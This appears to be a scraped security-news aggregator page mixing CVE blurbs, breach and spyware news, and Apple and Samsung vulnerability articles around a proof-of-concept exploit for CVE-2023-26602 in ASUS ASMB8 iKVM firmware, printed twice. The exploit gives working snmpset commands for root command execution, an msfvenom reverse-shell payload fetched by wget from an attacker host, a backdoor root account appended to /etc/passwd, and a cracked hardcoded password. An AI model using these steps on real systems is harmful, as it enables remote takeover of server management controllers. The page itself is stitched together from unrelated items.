A use-after-free flaw was found in the Linux kernel’s Ext4 File System in how a user triggers several file operations simultaneously with the overlay FS usage. This flaw allows a local user to crash or potentially escalate their privileges on the system. Only if patch 9a2544037600 ("ovl: fix use after free in struct ovl_aio_req") not applied yet, the kernel could be affected.

CVE-2023-1252: [PATCH 5.15 138/917] ovl: fix use after free in struct ovl_aio_req

In the Linux kernel before 6.1.3, fs/ntfs3/inode.c does not validate the attribute name offset. An unhandled page fault may occur.

CVE-2022-48424

By Habiba Rashid
The database was exposed due to a misconfigured AWS S3 bucket.
This is a post from HackRead.com Read the original post: Crypto exchange Fiatusdt leaked trove of users KYC data

****The server was exposed to the public without any password or security authentication, allowing access to tens of thousands of passport and ID card copies.****

In recent news, Jeremiah Fowler of Website Planet discovered an exposed database belonging to the online currency exchange platform, Fiatusdt. The database contained **cryptocurrency** sales records, including customer names, bank account numbers, purchase and sales records, and other sensitive information.

Online currency exchanges are internet-based platforms that facilitate the transfer of currencies for distribution in a stable, centralized setting between countries or companies. Like their physical counterparts, online currency exchanges make money by charging a nominal fee and/or through the bid-ask spread in a currency.

Amongst the exposed information were Know Your Customer (**KYC**) compliance records and identification images, which were particularly concerning as they contained sensitive information that proved the identity of customers.

Fowler reported having viewed as many as 20,000 passport and identity card images. The customer ID documents appeared to belong to individuals from all over the world, including the following countries:

1.  Oman
2.  China
3.  India
4.  Malaysia
5.  Australia
6.  Indonesia
7.  Singapore and others.

According to Website Planet’s **blog post**, it is still unclear how many users were affected by the data leak since the total number of records could not be seen, and whether or not the exposed records were accessed by anyone before being discovered.

Publically leaked folders and one of the ID cards (Image credit: Website Planet)

The database also contained screenshots of deposit and withdrawal amounts, which exposed bank transfer records identifying customer names, account numbers, email addresses, phone numbers, and other sensitive information.

Additionally, transaction IDs and wallet addresses for transactions were present in the database.

This database was exposed due to a **misconfigured AWS storage** name and address, which allowed public access. This resulted in the database being open and accessible to anyone with an internet connection.

The company was notified of the breach through a responsible disclosure notice, and public access to the database was subsequently closed.

1.  **Cryptoworm infecting AWS Cloud to mine cryptocurrency**
2.  **350M email IDs exposed on misconfigured AWS S3 bucket**
3.  **Pegasus Airlines Leaked 6.5TB Data in AWS Bucket Mess Up**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Crypto exchange Fiatusdt leaked trove of users KYC data

A mayor backing Polish opposition elections in parliament has been targeted by special services with Pegasus spyware.

Polish special services reportedly used the infamous Pegasus mobile spyware to monitor the phone of a mayor backing government opposition, according to a new report.

Polish liberal news outlet Gazeta Wyborcza, characterized by Reuters as being openly against the county's ruling "PiS" nationalists, reported while Sopot mayor Jacek Karnowski was working to elect opposition candidates in Poland's upper house of Parliament between 2018 and 2019, he was targeted by Israel-based NSO Group's Pegasus spyware. The report added that Karnowski's name was also discovered on a list of targets hacked with Pegasus spyware by Poland's special services.

"We will not allow the PiS machine to further destroy democracy, lead Poland to the East and sovietise our country," Karnowski told Reuters in reaction to the report. "The politicians who inspired and commissioned these activities belong in prison."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Polish Politician's Phone Patrolled by Pegasus

Sudo before 1.9.13p2 has a double free in the per-command chroot feature.

CVE-2023-27320: Stable Release

ASUS ASMB8 iKVM firmware versions 1.14.51 and below suffers from a flaw where SNMPv2 can be used with write access to introduce arbitrary extensions to achieve remote code execution as root. The researchers also discovered a hardcoded administrative account.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
# Exploit Title:        ASUS ASMB8 iKVM RCE and SSH Root Access  
# Date:                 2023-02-16  
# Exploit Author:       d1g@segfault.net for NetworkSEC [NWSSA-002-2023]  
# Vendor Homepage:      https://servers.asus.com/search?q=ASMB8  
# Version/Model:        ASMB8 iKVM Firmware <= 1.14.51 (probably others)  
# Tested on:            Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl  
# CVE:                  CVE-2023-26602  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++++++  
0x00    DESCRIPTION  
++++++++++++++++++++

During a recent engagement, a remote server management interface has been   
discovered. Furthermore, SNMPv2 was found to be enabled, offering write  
access to the private community, subsequently allowing us to introduce  
SNMP arbitrary extensions to achieve RCE.

We also found a hardcoded account sysadmin:superuser by cracking the   
shadow file (md5crypt) found on the system and identifed an "anonymous"  
user w/ the same password, however a lock seems to be in place to prevent  
using these credentials via SSH (running defshell as default shell).

+++++++++++++++  
0x01    IMPACT  
+++++++++++++++

By exploiting SNMP arbitrary extension, we are able to run any command on  
the system w/ root privileges, and we are able to introduce our own user  
circumventing the defshell restriction for SSH.

+++++++++++++++++++++++++++++++  
0x02    PROOF OF CONCEPT (PoC)  
+++++++++++++++++++++++++++++++

At first, we have to create required extensions on the system, e.g. via

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"'

and if everything is set, we can just run that command by

snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects

which will execute our defined command and show us its output.

+++++++++++++++++++++++++++++++  
0x03    SSH Remote Root Access  
+++++++++++++++++++++++++++++++

The identified RCE can be used to transfer a reverse tcp shell created  
by msfvenom for arm little-endian, e.g.

msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin

We can now transfer the binary, adjust permissions and finally run it:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"'  
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"'  
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"'

Again, we have to request execution of the lines in the MIB via:

snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects

We get a reverse connection from the host, and can now act on the local system   
to easily echo our own line into /etc/passwd:

echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd

By setting the standard shell to /bin/sh, we are able to get a SSH root  
shell into the system, effectively circumventing the defshell restriction.

$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g

BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash)  
Enter 'help' for a list of built-in commands.

# uname -a  
Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown  
# uptime  
 15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25  
# head -n 1 /etc/shadow  
sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7:::

---

#EOF

ASUS ASMB8 iKVM 1.14.51 SNMP Remote Root

ASUS ASMB8 iKVM firmware through 1.14.51 allows remote attackers to execute arbitrary code by using SNMP to create extensions, as demonstrated by snmpset for NET-SNMP-EXTEND-MIB with /bin/sh for command execution.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Exploit Title: AMI/ASUS ASMB8 iKVM RCE and SSH Root Access # Date: 2023-02-16 # Exploit Author: d1g@segfault.net for NetworkSEC \[NWSSA-002-2023\] # Vendor Homepage: https://servers.asus.com/search?q=ASMB8 # Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others) # Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl # CVE: Currently Unassigned (CVE-2023-XXXXX) ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++ 0x00 DESCRIPTION ++++++++++++++++++++ During a recent engagement, a remote server management interface has been discovered. Furthermore, SNMPv2 was found to be enabled, offering write access to the private community, subsequently allowing us to introduce SNMP arbitrary extensions to achieve RCE. We also found a hardcoded account sysadmin:superuser by cracking the shadow file (md5crypt) found on the system and identifed an "anonymous" user w/ the same password, however a lock seems to be in place to prevent using these credentials via SSH (running defshell as default shell). +++++++++++++++ 0x01 IMPACT +++++++++++++++ By exploiting SNMP arbitrary extension, we are able to run any command on the system w/ root privileges, and we are able to introduce our own user circumventing the defshell restriction for SSH. +++++++++++++++++++++++++++++++ 0x02 PROOF OF CONCEPT (PoC) +++++++++++++++++++++++++++++++ At first, we have to create required extensions on the system, e.g. via snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "\[command\]"' and if everything is set, we can just run that command by snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects which will execute our defined command and show us its output. +++++++++++++++++++++++++++++++ 0x03 SSH Remote Root Access +++++++++++++++++++++++++++++++ The identified RCE can be used to transfer a reverse tcp shell created by msfvenom for arm little-endian, e.g. msfvenom -p linux/armle/shell\_reverse\_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin We can now transfer the binary, adjust permissions and finally run it: snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"' snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"' snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"' Again, we have to request execution of the lines in the MIB via: snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects We get a reverse connection from the host, and can now act on the local system to easily echo our own line into /etc/passwd: echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd By setting the standard shell to /bin/sh, we are able to get a SSH root shell into the system, effectively circumventing the defshell restriction. $ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. # uname -a Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown # uptime 15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25 # head -n 1 /etc/shadow sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7::: --- #EOF

CVE-2023-26602

Categories: Android
Categories: News
Tags: Samsung

Tags:  message guard

Tags:  sandbox

Tags:  zero-click exploit

Tags:  images

Tags:  attachments

Samsung has announced the introduction of Message Guard protection against zero-click exploits for the Samsung Galaxy S23 series.



(Read more...)




The post Samsung adds Message Guard protection against zero-click exploits  appeared first on Malwarebytes Labs.

Samsung has announced the introduction of Message Guard for the Samsung Galaxy S23 series. It will be gradually rolled out to other Galaxy smartphones and tablets later this year.

Message Guard works on images received in messages by the apps “Samsung Messages” and “Messages by Google” and basically acts like a sandbox.

A sandbox in computing is a virtual habitat designed to provide a secluded environment to screen certain files or programs without giving any malware a chance to spread outside of the sandbox across the rest of the “playground”.

Samsung’s Message Guard is a sandbox that aims to protect your device by limiting exposure to invisible threats disguised as image attachments that arrive in messages received by Samsung Messages and Messages by Google. The plan is to release a software update at a later date to let Samsung Message Guard protect you across third party messaging apps as well.

**How it works**

When an image file arrives as an attachment to a message, the file is put in the sandbox and inspected. The file is processed inside the controlled environment of the sandbox to establish that it will not pose a threat to the device if it is released outside of the sandbox. This prevents malicious code from running amok or accessing your files. It does this silently in the background so the user doesn't have to do anything and might not even notice it’s there.

Samsung Message Guard covers the following image formats: PNG, JPG/JPEG, GIF, ICO, WEBP, BMP, and WBMP.

**Zero-click**

Zero-click malware is defined as malware that does not require any user action or input to infect a device or system. Zero-click exploits are files that hide malicious code which do not require user interaction to be executed.

Zero-click exploits typically depend on vulnerabilities in software running on the device, such as the messaging app or the software on the device that renders the image. Such a vulnerability could be used by an attacker to craft a malicious image that automatically executes the malicious code embedded within it.

Samsung Knox already protects against such attachments in audio and video form, behind the scenes. With Message Guard, Samsung says Galaxy users will be protected against exploits in image form too.

**Needed?**

Samsung states in the announcement that there has been no sign of such attacks on Samsung Galaxy smartphones, but it wants to anticipate potential threats and develop preemptive security measures. This is by no means far-fetched if you look at the methods that Pegasus used against iMessage, although those are highly targeted attacks on people in high-level roles.

Would you like us to list the reasons why we think this is not something we’ve been waiting for? OK then, here goes:

*   The Android Operating System is already based on sandboxing, so we don’t see how this is adding any extra protection.
*   There is no indication that this type of protection has been or ever will be needed.
*   At best it will be providing a false sense of security because it says it offers protection (against a non-existent threat).
*   At worst it will stop people from installing actual protection against threats that actually exist, because they think they already are under maximum protection.

Have a burning question or want to learn more about our cyberprotection? Get a free business trial below.

GET STARTED

Samsung adds Message Guard protection against zero-click exploits 

Apple has revised the security advisories it released last month to include three new vulnerabilities impacting iOS, iPadOS, and macOS.
The first flaw is a race condition in the Crash Reporter component (CVE-2023-23520) that could enable a malicious actor to read arbitrary files as root. The iPhone maker said it addressed the issue with additional validation.
The two other vulnerabilities,

Endpoint Security / Software Update

Apple has revised the security advisories it released last month to include three new vulnerabilities impacting iOS, iPadOS, and macOS.

The first flaw is a race condition in the Crash Reporter component (CVE-2023-23520) that could enable a malicious actor to read arbitrary files as root. The iPhone maker said it addressed the issue with additional validation.

The two other vulnerabilities, credited to Trellix researcher Austin Emmitt, reside in the Foundation framework (CVE-2023-23530 and CVE-2023-23531) and could be weaponized to achieve code execution.

"An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges," Apple said, adding it patched the issues with "improved memory handling."

The medium to high-severity vulnerabilities have been patched in iOS 16.3, iPadOS 16.3, and macOS Ventura 13.2 that were shipped on January 23, 2023.

Trellix, in its own report on Tuesday, classified the two flaws as a "new class of bugs that allow bypassing code signing to execute arbitrary code in the context of several platform applications, leading to escalation of privileges and sandbox escape on both macOS and iOS."

The bugs also bypass mitigations Apple put in place to address zero-click exploits like FORCEDENTRY that was leveraged by Israeli mercenary spyware vendor NSO Group to deploy Pegasus on targets' devices.

As a result, a threat actor could exploit these vulnerabilities to break out of the sandbox and execute malicious code with elevated permissions, potentially granting access to calendar, address book, messages, location data, call history, camera, microphone, and photos.

Even more troublingly, the security defects could be abused to install arbitrary applications or even wipe the device. That said, exploitation of the flaws requires an attacker to have already obtained an initial foothold into it.

"The vulnerabilities above represent a significant breach of the security model of macOS and iOS which relies on individual applications having fine-grained access to the subset of resources they need and querying higher privileged services to get anything else," Emmitt said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Apple Warns of 3 New Vulnerabilities Affecting iPhone, iPad, and Mac Devices

By Deeba Ahmed
The bugs allowed cybercriminals to bypass the iOS system's security protections and execute unauthorized code. 
This is a post from HackRead.com Read the original post: Apple Bug Could Allow Attackers Access to Photos and Messages

The findings are based on previous research from Google and Citizen Lab conducted in 2021 which discovered a zero-click, zero-day iOS exploit dubbed “ForcedEntry,” linked to the Israeli NSO Group.

Apple devices and products are known for their advanced security mechanisms, particularly the iPhone and Macbook. However, the latest research reveals that even Apple products aren’t safe from the prying eyes of threat actors.

Researchers at the cybersecurity firm Trellix Advanced Research Center have disclosed details of a newly discovered privilege escalation bug class that, if exploited, could allow an attacker to sweep up call history, messages, and photos from the device.

According to researchers, the bugs allowed cybercriminals to bypass the iOS system’s security protections and execute unauthorized code. The security flaws were ranked as medium to high in terms of security.

Trellix’s vulnerability research director, Doug McKee, stated that although Apple has addressed the issue, the concern is that these vulnerabilities allow bypassing of Apple’s security model at a “fundamental level.”

Apple said the bugs weren’t exploited in the wild before being fixed.

**How Was the Bug Discovered?**

The findings are based on previous research from Google and Citizen Lab conducted in 2021. The organizations discovered a zero-click, zero-day iOS exploit dubbed “ForcedEntry,” linked to NSO Group.

This was a highly sophisticated exploit found on a Saudi activist’s iPhone and was used for installing Pegasus malware developed by the NSO Group. The same spyware was also found on the iPhones of nine State Department officials in the United States.

This exploit had two key features: first, it tricked the iPhone into opening a malicious PDF disguised as a GIF file. Secondly, it enabled attackers to evade the sandbox that Apple introduced to prevent apps from accessing data from other apps or other parts of the device.

This second feature of ForcedEntry was the basis of Trellix’s research from senior vulnerability researcher Austin Emmitt. A proof-of-concept was released to demonstrate how the bugs could be exploited.

**Vulnerabilities**

Emmitt discovered a new class of vulnerabilities revolving around the NSPredicate tool that filters code within Apple’s systems. This tool was first exploited in ForcedEntry, as the 2021 research revealed, and Apple introduced new measures to prevent this abuse.

However, the mitigation methods were insufficient, as Trellix researchers found that these methods could also be bypassed since bugs in the NSPredicate class were found in multiple places in macOS and iOS systems.

This includes the Springboard app, which manages the home screen on an iPhone and can access photos, location data, and the camera. After exploiting the bugs, the attacker could access places they could not otherwise invade. Attackers trying to exploit it need to gain an initial foothold into the device.

Vulnerabilities in NSPredicate were discovered in macOS 13.2 and iOS 16.3, and Apple patched them with software updates in January. The company also issued CVEs for these flaws—CVE-2023-23530 and CVE-2023-23531—and released new versions of macOS and iOS.

1.  Apple AirTags used as trojan for credential hacking
2.  iOS Devices Receive Vital Security Updates from Apple
3.  Charging cable remotely steals data from Apple devices
4.  55 Apple bugs risked iCloud account takeover, data theft
5.  Study: Android sends more data to Google than iOS to Apple

Tag

#asus